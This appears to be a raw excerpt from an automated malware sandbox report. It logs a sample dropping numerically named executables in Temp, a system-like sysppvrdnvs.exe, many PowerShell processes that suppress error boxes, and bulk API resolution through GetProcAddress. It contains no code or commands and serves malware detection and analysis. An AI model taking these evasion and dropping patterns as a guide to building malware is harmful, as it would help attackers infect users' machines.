Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_00000001400536B0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00000001400536B0

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\sysppvrdnvs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
